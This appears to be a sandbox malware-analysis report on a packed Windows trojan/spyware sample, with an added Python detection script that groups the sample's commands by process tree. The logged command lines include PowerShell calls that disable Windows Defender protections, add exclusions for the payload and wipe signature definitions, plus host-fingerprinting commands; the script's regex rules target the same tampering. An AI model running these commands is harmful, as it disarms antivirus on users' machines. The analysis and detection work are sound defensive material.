                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A6D9802_2_00007FF8E7A6D980
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A215962_2_00007FF8E7A21596
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E80E1F402_2_00007FF8E80E1F40
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E80D11E02_2_00007FF8E80D11E0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E80D1E202_2_00007FF8E80D1E20
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E80F87342_2_00007FF8E80F8734
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E80FBF742_2_00007FF8E80FBF74
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E81079A82_2_00007FF8E81079A8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E8121C002_2_00007FF8E8121C00
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E80F5CBC2_2_00007FF8E80F5CBC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E80F54E82_2_00007FF8E80F54E8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E81471D02_2_00007FF8E81471D0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E81310912_2_00007FF8E8131091
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E8133E402_2_00007FF8E8133E40
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E81310C02_2_00007FF8E81310C0
                Source: C:\Users\user\AppData\Local\Temp\bound.exeCode function: 17_2_00007FF886766DB017_2_00007FF886766DB0
                Source: C:\Users\user\AppData\Local\Temp\bound.exeCode function: 17_2_00007FF88677254017_2_00007FF886772540
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: String function: 00007FF8E7A9D425 appears 48 times
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: String function: 00007FF8E8139598 appears 326 times
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: String function: 00007FF7EAD02910 appears 34 times
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: String function: 00007FF8E81394E8 appears 38 times
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: String function: 00007FF7EAD02710 appears 104 times
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: String function: 00007FF8E80FEB58 appears 49 times
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: String function: 00007FF8E7A21325 appears 518 times
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: String function: 00007FF8E80FEC88 appears 68 times
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: String function: 00007FF8E7A9D341 appears 1189 times
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: String function: 00007FF8E7A9D33B appears 39 times
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: String function: 00007FF8E7A9D32F appears 324 times
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: String function: 00007FF8E7A9DB03 appears 45 times
                Source: C:\Users\user\AppData\Local\Temp\bound.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7976 -s 2228
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Static PE information: invalid certificate
                Source: rar.exe.0.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                Source: unicodedata.pyd.0.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Binary or memory string: OriginalFilename vs SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Binary or memory string: OriginalFilenamedispdiag.exej% vs SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                Source: libcrypto-3.dll.0.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9991990186771459
                Source: libssl-3.dll.0.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9923211348684211
                Source: python313.dll.0.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9994153529876473
                Source: sqlite3.dll.0.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9975483390549273
                Source: unicodedata.pyd.0.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9926987474437627
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@43/44@7/5
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7708:120:WilError_03
                Source: C:\Users\user\AppData\Local\Temp\bound.exe | Mutant created: NULL
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7716:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8028:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8008:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:120:WilError_03
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Mutant created: \Sessions\1\BaseNamedObjects\X
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7900:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7844:120:WilError_03
                Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7976
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI76122
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | ReversingLabs: Detection: 52%
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | String found in binary or memory: set-addPolicy
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | String found in binary or memory: id-cmc-addExtensions
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | String found in binary or memory: can't send non-None value to a just-started generator
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | String found in binary or memory: can't send non-None value to a just-started async generator
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | String found in binary or memory: --help
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | String found in binary or memory: fma($module, x, y, z, /) -- Fused multiply-add operation. Compute (x * y) + z with a single round.
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | String found in binary or memory: can't send non-None value to a just-started coroutine
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | String found in binary or memory: various kinds of output. Setting it to 0 deactivates this behavior. PYTHON_HISTORY : the location of a .python_history file. These variables have equivalent command-line options (see --help for details): PYTHON_CPU_COUNT: override the retu
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | String found in binary or memory: /ADd$
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | File read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe'"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe'
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "start bound.exe"
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\bound.exe bound.exe
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\bound.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                Source: C:\Users\user\AppData\Local\Temp\bound.exe | Process created: C:\Windows\System32\cmd.exe "cmd" /c ipconfig /all
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\AppData\Local\Temp\bound.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7976 -s 2228
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe'"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "start bound.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe'
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'
                Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\bound.exe bound.exe
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                Source: C:\Users\user\AppData\Local\Temp\bound.exe Process created: C:\Windows\System32\cmd.exe "cmd" /c ipconfig /all
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
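The process-creation lines above show three Defender tampering actions (Set-MpPreference disabling protections and cloud reporting, Add-MpPreference excluding the dropper and the payload, MpCmdRun -RemoveDefinitions -All) and a fingerprinting chain (tasklist, wmic csproduct get uuid, ipconfig /all) all descending from the submitted sample. The script below is an added example, not part of the Joe Sandbox report and not code from the sample's author: it classifies constructed process-creation events with those command lines and attributes every hit to its process-tree root, so the chain is graded as a whole rather than as isolated single-command alerts. The event schema (pid, ppid, image, cmdline), the PIDs and the placeholder path sample.exe are assumptions; the command lines themselves are copied from the report.

```python
"""Added example (not from the Joe Sandbox report or the sample's author):
flag the Defender-tampering and host-fingerprinting chain listed above from
process-creation events. Event schema, PIDs and the sample.exe path are
assumptions; the command lines are copied from the report."""
import re
from dataclasses import dataclass
from typing import Dict, List, Set


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# One pattern per technique, matched case-insensitively against the command line.
RULES: Dict[str, re.Pattern] = {
    # Set-MpPreference turning a protection off or downgrading cloud telemetry.
    "defender_disabled": re.compile(
        r"Set-MpPreference\b.*?("
        r"-Disable\w+\s+\$true"
        r"|-EnableControlledFolderAccess\s+Disabled"
        r"|-EnableNetworkProtection\s+(AuditMode|Disabled)"
        r"|-MAPSReporting\s+(Disabled|0)"
        r"|-SubmitSamplesConsent\s+(NeverSend|2))", re.I),
    # Add-MpPreference whitelisting a path, process or extension.
    "defender_exclusion": re.compile(
        r"Add-MpPreference\b.*?-Exclusion(Path|Process|Extension)\b", re.I),
    # MpCmdRun wiping the signature definitions.
    "definitions_removed": re.compile(
        r"MpCmdRun(\.exe)?[\"']?\s+-RemoveDefinitions\b", re.I),
    # Process list, SMBIOS UUID and adapter configuration: machine fingerprinting.
    "host_recon": re.compile(
        r"\btasklist\b|\bwmic\s+csproduct\s+get\s+uuid\b|\bipconfig\s+/all\b", re.I),
}


def classify_cmdline(cmdline: str) -> Set[str]:
    """Return the names of every rule whose pattern matches the command line."""
    return {name for name, pat in RULES.items() if pat.search(cmdline)}


def root_of(pid: int, by_pid: Dict[int, ProcEvent]) -> int:
    """Follow parent links to the oldest ancestor present in the event set."""
    seen = set()
    while pid not in seen and by_pid[pid].ppid in by_pid:
        seen.add(pid)
        pid = by_pid[pid].ppid
    return pid


def triage(events: List[ProcEvent]) -> Dict[int, dict]:
    """Attribute every hit to its process-tree root and grade each root."""
    by_pid = {e.pid: e for e in events}
    findings: Dict[int, dict] = {}
    for e in events:
        cats = classify_cmdline(e.cmdline)
        if not cats:
            continue
        root = root_of(e.pid, by_pid)
        entry = findings.setdefault(
            root, {"image": by_pid[root].image, "categories": set(), "hits": []})
        entry["categories"] |= cats
        entry["hits"].append((e.pid, sorted(cats)))
    tamper = {"defender_disabled", "defender_exclusion", "definitions_removed"}
    for entry in findings.values():
        # Disabling protection, excluding the payload and wiping definitions
        # together are the full chain in the report; anything less is a lead.
        entry["verdict"] = ("defender_tampering_chain"
                            if tamper <= entry["categories"] else "suspicious")
    return findings


# Constructed events mirroring the report's process tree (PIDs are made up).
SAMPLE = r"C:\Users\user\Desktop\sample.exe"
CMD = r"C:\Windows\System32\cmd.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MPCMDRUN = r"C:\Program Files\Windows Defender\MpCmdRun.exe"
BOUND = r"C:\Users\user\AppData\Local\Temp\bound.exe"
SAMPLE_EVENTS = [
    ProcEvent(1000, 900, SAMPLE, '"' + SAMPLE + '"'),
    ProcEvent(1001, 1000, CMD, r'''C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"'''),
    ProcEvent(1002, 1001, PS, r"powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"),
    ProcEvent(1003, 1000, CMD, r'''C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"'''),
    ProcEvent(1004, 1003, MPCMDRUN, r'''"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All'''),
    ProcEvent(1005, 1000, CMD, r'C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"'),
    ProcEvent(1006, 1000, CMD, r'C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"'),
    ProcEvent(1007, 1000, CMD, r'C:\Windows\system32\cmd.exe /c "start bound.exe"'),
    ProcEvent(1008, 1007, BOUND, "bound.exe"),
    ProcEvent(1009, 1008, CMD, r'"cmd" /c ipconfig /all'),
    # Benign administrator activity for contrast: a read-only query, no hits.
    ProcEvent(2000, 1900, PS, "powershell Get-MpPreference"),
]

if __name__ == "__main__":
    for root, entry in triage(SAMPLE_EVENTS).items():
        print(f"root pid {root} ({entry['image']}): {entry['verdict']}")
        for pid, cats in entry["hits"]:
            print(f"  pid {pid}: {', '.join(cats)}")
```

Grouping by tree root matters here because each tampering command is launched through its own cmd.exe child, so a rule that looks at one powershell.exe process at a time sees three separate low-confidence events instead of one chain. The host_recon rule fires on routine administration as well; on its own it only raises the verdict to suspicious, and it is the co-occurrence with the three Defender actions under one parent that produces the high-confidence verdict.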
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe Section loaded: vcruntime140.dll
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe Section loaded: python3.dll
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe Section loaded: libffi-8.dll
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe Section loaded: sqlite3.dll
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe Section loaded: libcrypto-3.dll
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe Section loaded: libssl-3.dll
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe Section loaded: dnsapi.dll
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe Section loaded: fwpuclnt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
